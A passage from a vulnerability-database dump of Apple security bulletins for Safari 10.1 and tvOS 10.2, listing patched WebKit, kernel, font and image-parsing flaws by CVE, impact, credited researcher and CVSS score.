of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project 
Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: an anonymous researcher\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2392: Max Bazaliy of Lookout\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7071: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative \n\nEntry added August 23, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of Safari 10.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2385", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2486", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-7071"], 
"modified": "2017-03-27T00:00:00", "id": "APPLE:581D1ADF40E75038A35B5C18CE7EDD03", "href": "https://support.apple.com/kb/HT207600", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-01T00:00:00", "description": "# About the security content of tvOS 10.2\n\nThis document describes the security content of tvOS 10.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform 
Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input 
validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was 
addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS 
connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: natashenka of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through 
improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. 
This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of tvOS 10.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", 
"CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-27T00:00:00", "id": "APPLE:C3300089BE0D932332C0D20113B0C302", "href": "https://support.apple.com/kb/HT207601", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:40", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, 
Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. 
These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
